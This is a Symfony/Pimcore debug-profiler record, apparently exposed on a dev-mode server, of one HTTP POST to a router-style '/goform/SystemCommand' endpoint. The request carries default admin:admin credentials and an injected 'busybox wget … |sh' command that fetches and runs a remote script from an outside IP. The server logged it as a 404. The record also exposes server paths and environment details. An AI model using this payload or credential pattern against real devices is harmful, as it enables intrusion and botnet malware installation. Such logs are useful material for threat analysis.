http://23.239.8.65/goform/SystemCommand

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
SystemCommandSubmit
"Apply"
command
"busybox wget -qO- http://74.194.191.52/rondo.qyz.sh|sh&"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_editmode
false
_pimcore_context
"default"
_pimcore_frontend_request
true
_remove_csp_headers
true
_stopwatch_token
"2bec3d"

Request Headers

Header Value
accept
"*/*"
authorization
"Basic YWRtaW46YWRtaW4="
connection
"close"
content-length
"107"
content-type
"application/x-www-form-urlencoded"
host
"23.239.8.65"
php-auth-pw
"******"
php-auth-user
"admin"
user-agent
"Mozilla/5.0 (bang2013@atomicmail.io)"
x-php-ob-level
"1"

Request Content

Raw

command=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.qyz.sh%7Csh%26&SystemCommandSubmit=Apply

Response

Response Headers

Header Value
cache-control
"private, must-revalidate"
content-language
"en"
content-type
"text/html; charset=UTF-8"
date
"Thu, 30 Oct 2025 06:51:59 GMT"
expires
"Tue, 01 Jan 1980 00:00:00 GMT"
pragma
"no-cache"
x-debug-exception
"No%20route%20found%20for%20%22POST%20http%3A%2F%2F23.239.8.65%2Fgoform%2FSystemCommand%22"
x-debug-exception-file
"%2Fvar%2Fwww%2Fpimcore%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token
"8a2d2f"
x-debug-token-link
"http://23.239.8.65/_profiler/2cbce9"
x-powered-by
"pimcore"
x-previous-debug-token
"2cbce9"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_DEBUG
"1"
APP_ENV
"dev"
PIMCORE_DEV_MODE
"false"

Defined as regular env variables

Key Value
CONTENT_LENGTH
"107"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/var/www/pimcore/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/pimcore/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTP_ACCEPT
"*/*"
HTTP_AUTHORIZATION
"Basic YWRtaW46YWRtaW4="
HTTP_CONNECTION
"close"
HTTP_HOST
"23.239.8.65"
HTTP_USER_AGENT
"Mozilla/5.0 (bang2013@atomicmail.io)"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_AUTH_PW
"******"
PHP_AUTH_USER
"admin"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_HTTP_AUTHORIZATION
"Basic YWRtaW46YWRtaW4="
REDIRECT_SCRIPT_URI
"http://23.239.8.65/goform/SystemCommand"
REDIRECT_SCRIPT_URL
"/goform/SystemCommand"
REDIRECT_STATIC_PAGE_URI
"/%home"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/goform/SystemCommand"
REMOTE_ADDR
"124.198.131.83"
REMOTE_PORT
"37144"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"http"
REQUEST_TIME
1761807119
REQUEST_TIME_FLOAT
1761807119.5468
REQUEST_URI
"/goform/SystemCommand"
SCRIPT_FILENAME
"/var/www/pimcore/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"http://23.239.8.65/goform/SystemCommand"
SCRIPT_URL
"/goform/SystemCommand"
SERVER_ADDR
"23.239.8.65"
SERVER_ADMIN
"admin@example.com"
SERVER_NAME
"23.239.8.65"
SERVER_PORT
"80"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.41 (Ubuntu) Server at 23.239.8.65 Port 80</address>\n"
SERVER_SOFTWARE
"Apache/2.4.41 (Ubuntu)"
STATIC_PAGE_URI
"/%home"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE"
USER
"www-data"
proxy-nokeepalive
"1"

Sub Requests 1

ErrorController (token = 2cbce9)

Key Value
_controller
"error_controller"
_editmode
false
_pimcore_context
"default"
_stopwatch_token
"a43f18"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1703
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST http://23.239.8.65/goform/SystemCommand""
  #code: 0
  #file: "/var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#1704 …}
  trace: {
    /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/pimcore/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/pimcore/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/pimcore/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/pimcore/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/pimcore/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/pimcore/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/pimcore/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/pimcore/public/index.php:36 {
      › 
      › $response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#279 …9}